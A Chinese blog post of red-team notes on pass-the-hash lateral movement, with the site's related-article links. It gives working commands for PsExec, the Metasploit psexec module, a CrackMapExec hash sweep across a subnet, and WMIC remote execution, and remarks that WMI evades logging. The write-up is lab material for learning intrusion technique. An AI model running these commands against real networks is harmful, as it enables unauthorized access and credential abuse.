内网横向之PTH

最新推荐文章于 2024-10-10 13:00:00 发布
最新推荐文章于 2024-10-10 13:00:00 发布
阅读量2.2k 收藏 5
点赞数 1
分类专栏: 内网 文章标签: windows 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44029310/article/details/127345703
版权

文章目录

前言

      内网横向之PTH,以前的笔记整理,方便查看翻找。本文包括PsExec、CrackMapExec和WMI。

一、PsExec

1.概念描述

     psexec 是 windows 官方自带的,不会存在查杀问题,属于 pstools 利用 PsExec 可以在远程计算机上执行命令,其基本原理是通过管道在远程目标主机上创建一个psexec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过psexec 服务运行命令,运行结束后删除服务。利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。对方开放 445 端口,就相当于开放了 smb 协议。

2.利用注意点

  • 需要远程系统开启 admin$ 共享(默认是开启的)
  • 因为 PsExec 连接的原理是基于 IPC 共享,因此目标需要开放 445 端口
  • 在使用 IPC$ 连接目标系统后,不需要输入账户和密码。
  • 在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 的服务, 命令执行完后,psexec服务将被自动删除。由于创建或删除服务时会产生 大量的日志,因此蓝队在溯源时可以通过日志反推攻击流程。
  • 使用 PsExec 可以直接获得 System 权限的交互式 Shell 的前提目标是 administrator 权限的 shell。
  • 在域环境测试时发现,非域用户无法利用内存中的票据使用 PsExec 功能, 只能依靠账号和密码进行传递。

3.靶机利用之第一种

     第一种直接利用psexec程序方式。

# 使用账号和明文密码
# 参数解释:
# -accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
# -s 以 System 权限运行远程进程,如果不用这个参数,就会获得一个对应用户权限的 shell
直接直接执行回显
# -u 域/用户名
# -p 密码/hash
PsExec64.exe /accepteula /s \\192.168.0.123 -u Administrator -p 123456 cmd.exe
PsExec64.exe  \\192.168.0.141 -u Administrator -p 123456 cmd.exe /c "ipconfig"

在这里插入图片描述
在这里插入图片描述

# 使用账号和hash
# 参数解释:
# -accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
# -s 以 System 权限运行远程进程,如果不用这个参数,就会获得一个对应用户权限的 shell
直接直接执行回显
# -u 域/用户名
# -p 密码/hash
PsExec.exe /accepteula /s \\192.168.0.141 -u Administrator -p 123456 cm
d /c "ipconfig

4.靶机利用之第二种

     1)第二种是Metasploit中的psexec模块。先利用hashdump获取hash。
在这里插入图片描述     2)在MSF中搜索psexec,使用然后配置参数使用。

use exploit/windows/smb/psexec
set SMBUser Administrator
set rhosts 192.168.0.141
set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba885473
76818d4

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、CrackMapExec

1.概念描述

     CrackMapExec 可以对 C 段中的主机进行批量 pth或者密码喷洒,项目地址:https://github.com/Porchetta-Industries/CrackMapExec。kali可以直接sudo apt install crackmapexec安装。

2.靶机利用

     对192.168.9.0/24 C 段进行批量 pass the hash。

crackmapexec smb 192.168.0.0/24 -u administrator -H 32ed87bdb5fdc5e9cba
88547376818d4

在这里插入图片描述

三、WMI

1.概念描述

     WMI 全称 Windows Management Instrumentation 即 Windows 管理工具,Windows 98 以后的操作系统都支持 WMI。由于 Windows 默认不会将 WMI 的操作记录在日志里,同时现在越来越多的杀软将PsExec 加入了黑名单,因此 WMI 比 PsExec 隐蔽性要更好一些。

2.靶机利用

     WMI 连接远程主机,并使用目标系统的 cmd.exe 执行命令,将执行结果保存在目标主机 C 盘的 ip.txt 文件中。使用 WMIC 连接远程主机,需要目标主机开放 135 和 445 端口( 135 端⼝是 WMIC 默认的管理端⼝,wimcexec 使⽤445 端⼝传回显)。

wmic /node:192.168.0.123 /user:administrator /password:123456 process call create "cmd.exe /c ipconfig > c:\ip.txt

在这里插入图片描述
     建立 IPC$ ,使用 type 读取执行结。
在这里插入图片描述

红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 379
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 2182
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
CrackMapExec命令详细使用教程
Jeromeyoung
06-08 3798
CrackMapExec工具详细使用教程
Crackmapexec一键检测网络环境(KALI工具系列四十四)
LNN0212的博客
07-15 888
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。CrackMapExec(CME)是一个功能强大的开源工具,广泛用于网络渗透测试和红队操作。
crackmapexec工具详解
网络安全。
01-12 2784
即使找到有效密码后,使用 --continue-on-success 标志也会继续喷射。CME 确实支持 Kerberos 身份验证,有两种选择,直接使用密码/哈希或使用票证并使用环境KRB5CCNAME名称指定票证。使用选项-k or–use-kcache 时,您需要指定与 kerberos 票证中的主机名相同的主机名 (FQDN)有关通过特定协议使用凭据的详细信息,请参阅相应的 wiki 部分。2、当使用包含特殊符号的用户名或密码时,请将它们用单引号引起来,以使 shell 将它们解释为字符串。
内网渗透TIPS总结
Javachichi的博客
03-13 862
更可靠:更少的宕机时间。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。通过域成员主机,定位出 域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进而拿下域控制器、渗透整个内网
内网渗透之横向移动wmi&smb&密码喷射CrackMapExec
m0_62207170的博客
04-22 2577
内网渗透之横向移动wmi&smb&密码喷射CrackMapExec
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4604
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
内网安全 - 域横向 PTH&PTK&PTT
acepanhuan的博客
03-16 519
内网安全 - 域横向 PTH&PTK&PTT
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具.zip
10-10
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具 CrackMapExecWin描述为 Windows 编译的伟大 CrackMapExec 工具特性最新 2.2 版本编译为 x86,因此应该在 x86 和 x64 平台上工作用法下载整个归档文件。提取并运行 cra
Crackmapexec-LAPS:用于CrackMapExec的LAPS模块
05-23
Crackmapexec-LAPS 用于CrackMapExec的LAPS模块 确保指向DC 指定完整的域名请注意,摆脱500可能不是“管理员” 用法: crackmapexec smb IP -u用户-d DOMAIN.COM -H NTLM-HASH -M圈crackmapexec smb IP -u用户-d DOMAIN.COM -p CLEAR-TEXT -M圈 技术模块Grazie:根据CME byt3bl33d3r @snowscan @HackAndDo 信用:@ n00py1信用参考: ://www.n00py.io/2020/12/dumping-laps-passwords-from-linux/ 信用
CrackMapExec 结合攻击
liqiuman180688的博客
05-09 1426
文章作者:Micropoor 原文链接:https://micropoor.blogspot.com CrackMapExec弥补了MSF4下auxiliary,scanner模块下的Command执行方式,但MSF5已解决该问题。在MSF4下,该框架针对后渗透的横向移动经常出现,虽然MSF5已解决该问题,但该框架在配合bloodhound与empire依然目前有一定优势。 安装方式:from...
PsExec横向:IPC&PTH&PTT
8888的博客
07-28 1071
PsExec工具:psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享和ipc$ (该共享默认开启,依赖于445端口)。但是,假如目标主机开启了防火墙(防火墙禁止445端口连接),psexec也是不能使用的,会提示找不到网络路径。
第五篇红队笔记-百靶精讲之LampSecurityCTF-SSH参数-hashcat密码破解-crackmapexec功能/协议
admin741admin的博客
12-01 575
mysql users表的账号和密码。识别hash为md5。
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 958
内网渗透—哈希传递攻击PTH的几种方式
内网横向移动—Wmi&Smb&CrackMapExec&ProxyChains&Impacket
剁椒鱼头没剁椒的博客
06-30 1404
Windows中的wmi是Windows管理工具,它是Windows操作系统中管理数据和操作的基础模块,并且wmic 是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,同时该方法不会在目标日志系统留下痕迹。
内网安全PTH PTK PTT
Karka_的博客
10-10 2009
实验所用网络拓朴图网络环境说明​​​​​​​LM认证NTLM认证NTLM HashKerberos认证TGT票据服务票据Windows系统密码存储域控制器 - 用户登录 域用户 本地用户域用户和本地管理员用户登录Mimikatz抓取密码来源域内一台主机上可以得到非本地用户Hash的原因域横向移动:哈希传递攻击(PTH)- NTLM认证攻击PTH攻击原理利用方式一:Mimikatz利用方式二:Impacket利用方式三:CrackMapExec 密码喷射。
pth常用工具
whojoe的博客
01-21 1038
pth常用工具实现rdpPTHCrackMapExec 实现rdp windows privilege::debug sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin" kali xfreerdp /u:administrator /pth:d25ecd13fddbb542d2e16da4f9e0333d
内网横向渗透流量特征
最新发布
01-14
### 内网横向渗透攻击的网络流量特征 在网络环境中,内网横向移动是指攻击者在成功入侵一个内部主机后,在同一网络内的其他计算机之间传播的行为。这种行为通常伴随着特定类型的网络活动模式。 #### SMB协议异常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值